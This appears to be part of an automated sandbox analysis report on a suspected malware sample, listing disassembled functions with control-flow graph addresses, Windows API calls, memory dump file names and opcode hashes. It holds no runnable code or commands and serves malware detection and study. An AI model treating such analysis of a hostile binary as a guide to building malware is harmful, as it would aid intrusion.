                                                                                                                                                                                                                                          Function 000B8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 74 b8600-b8611 call ed9a0 77 b8a48-b8a4f ExitProcess 74->77 78 b8617-b861e call e62a0 74->78 81 b8a31-b8a38 78->81 82 b8624-b864a 78->82 83 b8a3a-b8a40 call b7f60 81->83 84 b8a43 call ee080 81->84 90 b864c-b864e 82->90 91 b8650-b887f 82->91 83->84 84->77 90->91 93 b8880-b88ce 91->93 93->93 94 b88d0-b891d call ec540 93->94 97 b8920-b8943 94->97 98 b8945-b8962 97->98 99 b8964-b897c 97->99 98->97 101 b8a0d-b8a25 call b9d00 99->101 102 b8982-b8a0b 99->102 101->81 105 b8a27 call bcb90 101->105 102->101 107 b8a2c call bb7b0 105->107 107->81
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 000B8A4A
                                                                                                                                                                                                                                            • Part of subcall function 000BB7B0: FreeLibrary.KERNEL32(000B8A31), ref: 000BB7B6
                                                                                                                                                                                                                                            • Part of subcall function 000BB7B0: FreeLibrary.KERNEL32 ref: 000BB7D7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                          • String ID: b]u)$}$}
                                                                                                                                                                                                                                          • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                          • Opcode ID: e125676d0c64cf3bd74b0c7c7f46a250cf3bbe2787576093626a785a0e5b9389
                                                                                                                                                                                                                                          • Instruction ID: f14728cd3e15210016fd1a0cdfcb32e21e8e214c0687992fa284ce7b3b2e3e0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e125676d0c64cf3bd74b0c7c7f46a250cf3bbe2787576093626a785a0e5b9389
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC1F673E187144BC718DF69C84125AF7D6ABC8710F0EC52EA898EB365EA74DC058BC6
                                                                                                                                                                                                                                          Function 000EE110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 186 ee110-ee142 LdrInitializeThunk
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(000F148A,?,00000018,?,?,00000018,?,?,?), ref: 000EE13E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                          Function 000F1720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 188 f1720-f1741 189 f1750-f176b 188->189 189->189 190 f176d-f1779 189->190 191 f177b-f1785 190->191 192 f17e0-f17e5 190->192 193 f1790-f1797 191->193 194 f17eb-f17ff 192->194 195 f1879-f187b 192->195 196 f17ad-f17b5 193->196 197 f1799-f17a7 193->197 200 f1800-f181b 194->200 198 f188d-f1894 195->198 199 f187d-f1884 195->199 196->192 202 f17b7-f17d8 call ee110 196->202 197->193 201 f17a9-f17ab 197->201 203 f188a 199->203 204 f1886 199->204 200->200 205 f181d-f1828 200->205 201->192 210 f17dd 202->210 203->198 204->203 207 f182a-f1832 205->207 208 f1871-f1873 205->208 211 f1840-f1847 207->211 208->195 209 f1875 208->209 209->195 210->192 212 f1849-f184c 211->212 213 f1850-f1856 211->213 212->211 214 f184e 212->214 213->208 215 f1858-f186e call ee110 213->215 214->208 215->208
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID: =<32
                                                                                                                                                                                                                                          • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                          • Opcode ID: 6d42fd1eea1912698bf9f336692cdc09693dc95fae7e364cf8babbf566ff64a0
                                                                                                                                                                                                                                          • Instruction ID: 1d7b4c4b5ed1f28820725b1a6baa5406e286d57add123a119fbd562bf1e1c558
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d42fd1eea1912698bf9f336692cdc09693dc95fae7e364cf8babbf566ff64a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E315734708308DBE7149A14DC91BBFB7E6EB85790F18852CE788976E0DB35EC41A782
                                                                                                                                                                                                                                          Function 000B9D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 136 b9d1e-b9d34 137 b9d40-b9d52 136->137 137->137 138 b9d54-b9d7e 137->138 139 b9d80-b9d92 138->139 139->139 140 b9d94-b9e13 LoadLibraryExW call ed960 139->140 143 b9e20-b9e32 140->143 143->143 144 b9e34-b9e5e 143->144 145 b9e60-b9e72 144->145 145->145 146 b9e74-b9e80 LoadLibraryExW call ed960 145->146 148 b9e85-b9e98 146->148
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000), ref: 000B9D98
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000), ref: 000B9E78
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: e6b70674ab715269d8fb247b1a4ab930f90dd02ee8ac473b03eebecd50ca8b9a
                                                                                                                                                                                                                                          • Instruction ID: eb616a30aaa843e1b8fff2d5af482e2ce016dfa7b484d0fea0a4b961731346b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b70674ab715269d8fb247b1a4ab930f90dd02ee8ac473b03eebecd50ca8b9a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 974112B4E003409FE7549F789DD2A9A7FB1EB07324F50429CD5A02F3A6C635940ACBE2
                                                                                                                                                                                                                                          Function 000BEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 161 bef53-bf0b5 CoInitializeEx
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 000BF09D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2538663250-0
                                                                                                                                                                                                                                          • Opcode ID: ba5579bd130534a6929a78fbf55eb706992fe42374aa4d60932671452ac125ac
                                                                                                                                                                                                                                          • Instruction ID: f368a4a52ef647f9fb93a9c44af8855172a06a796975ac1bd794611cf65f7b76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba5579bd130534a6929a78fbf55eb706992fe42374aa4d60932671452ac125ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F41D8B4810B40AFD370EF3D994B7137EB8AB05250F504B1EF9EA866D4E231A4198BD7
                                                                                                                                                                                                                                          Function 000EE0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 163 ee0a0-ee0b1 164 ee0e8-ee0f1 call ec540 163->164 165 ee0c6-ee0cd 163->165 166 ee0d4-ee0e6 call ef990 RtlReAllocateHeap 163->166 167 ee0f3-ee0f4 call ec570 163->167 168 ee0c0 163->168 175 ee0fe-ee100 164->175 165->166 165->167 166->175 174 ee0f9-ee0fc 167->174 168->165 174->175
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000), ref: 000EE0E0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                          • Opcode ID: 48ff2f3e9a33151e7063ce463edbfe9dbf944c2ae24332528888596c92a0530d
                                                                                                                                                                                                                                          • Instruction ID: 872c4652a98ceb7626d43ec2434ff9c745bfb20e739c9dc062cc631af9aff675
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48ff2f3e9a33151e7063ce463edbfe9dbf944c2ae24332528888596c92a0530d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0A032914292EFE2202F29BD05AAB3AA4AFC2760F060435F41066122DE79E857D591
                                                                                                                                                                                                                                          Function 000BEC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 176 bec77-becbb CoInitializeSecurity
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000BECA2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeSecurity
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 640775948-0
                                                                                                                                                                                                                                          • Opcode ID: a4fffb842e13342c91014bc4d5feb7e10a92677ebc6c1538881456c1eedbfe53
                                                                                                                                                                                                                                          • Instruction ID: 74709c8fb0b352bdb57db7c7e0648676e099644072b824d80cf082b314002e27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4fffb842e13342c91014bc4d5feb7e10a92677ebc6c1538881456c1eedbfe53
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDE092343DA742BAF63D82549C63F2522065B42F2AE305B08B3353EBD4CAD43102800D
                                                                                                                                                                                                                                          Function 000B9EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 178 b9eb7-b9ef7 call efe00 WSAStartup
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 000B9ED2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Startup
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 724789610-0
                                                                                                                                                                                                                                          • Opcode ID: a46fde8f4a1a4ed7e0d035c2242f413046b3824668a07d03535c62075fd2069b
                                                                                                                                                                                                                                          • Instruction ID: df8d53d06c3ed057866fe5e33c76f360e866c9be17c23d624ae95d68d47082fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a46fde8f4a1a4ed7e0d035c2242f413046b3824668a07d03535c62075fd2069b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DE02B737406039BF700DB38EC47EB93357DB563427068428E205D1572EA76A510EA10
                                                                                                                                                                                                                                          Function 000EC570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 181 ec570-ec57c 182 ec585-ec597 call ef990 RtlFreeHeap 181->182 183 ec583-ec584 181->183
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,?,000EE0F9), ref: 000EC590
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
